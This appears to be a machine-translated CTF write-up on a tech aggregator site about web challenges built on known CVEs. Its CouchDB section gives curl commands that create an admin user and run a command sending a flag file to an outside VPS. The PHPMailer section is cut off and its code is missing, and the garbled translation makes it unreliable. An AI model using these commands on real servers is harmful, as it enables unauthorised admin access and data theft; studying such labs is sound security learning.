Shulou(Shulou.com)05/31 Report--

What this article shares with you is the example analysis of the topic of combining web with CVE. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.

Preface of 0x00

Recently, I have encountered some reproductions of CVE, among which there are some good ones. Today we introduce the following four topics combined with CVE:

CVE-2017-12635 (CouchDB)

CVE-2016-10033 (PHPMailer)

CVE-2017-17562 (GoAhead)

CVE-2014-6271 (shellshock)

Note: according to the order of topics from simple to difficult

0x01 CVE-2017-12635 (CouchDB)

After getting the question, I found that port 80 could not be accessed, so I swept the port.

Found that 5984 is open.

After searching it, it was found that it was a CouchDB loophole.

And then found that 2017 of CVE:CVE-2017-12635

That is, because of the difference between the CouchDB Erlang-based JSON parser and the JavaScript-based JSON parser, an _ users document with duplicate keys for access control roles can be submitted in the database, including the special case _ admin role that represents administrative users. Used in conjunction with CVE-2017-12636 (remote code execution), non-administrator users can access arbitrary shell commands on the server as database system users.

Differences in the JSON parser can lead to behavior: if two role keys are available in JSON, the second will be used for authorizing document writes, but the first role key will be used for subsequent authorization of the newly created user. By design, users cannot assign their own roles. The vulnerability allows non-administrator users to give themselves administrator privileges.

For more information on vulnerabilities, see:

Https://cert.360.cn/warning/detail?id=0bc3f86b333bf27fe26fe6fdc8bda5f8

So we can create an administrator user

Curl-X PUT 'http://192.168.5.39:5984/_users/org.couchdb.user:sky'-data-binary' {"type": "user", "name": "sky", "roles": ["_ admin"], "roles": [], "password": "sky"}'

Then we can log in with the administrator user, which is followed by the play of unauthorized vulnerabilities:

Curl-X PUT 'http://sky:sky@192.168.5.39:5984/_config/query_servers/cmd'-d' "/ usr/bin/curl http:// your vps/cat / home/flag.txt"'

Curl-X PUT 'http://sky:sky@192.168.5.39:5984/skytest

Curl-X PUT 'http://sky:sky@192.168.5.39:5984/skytest/vul'-d' {"_ id": "770895a97726d5ca6d70a22173005c7b"}

Curl-X POST 'http://sky:sky@192.168.5.39:5984/skytest/_temp_view?limit=11'-d' {"language": "cmd", "map": ""}'- H 'Content-Type: application/json'

After a while, flag called vps:

Flag {ByeBye_1VerY0n1_have8un} 0x02 CVE-2016-10033 (PHPMailer)

Get the title: http://192.168.5.69/

It's a message board interface.

I thought it was XSS, but I tried in vain for a long time, but I tried to leak the file again.

Get the source code and give the key loopholes:

Visit

Http://192.168.5.69/skyskysky.php

It was found that the file was written successfully.

00040

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.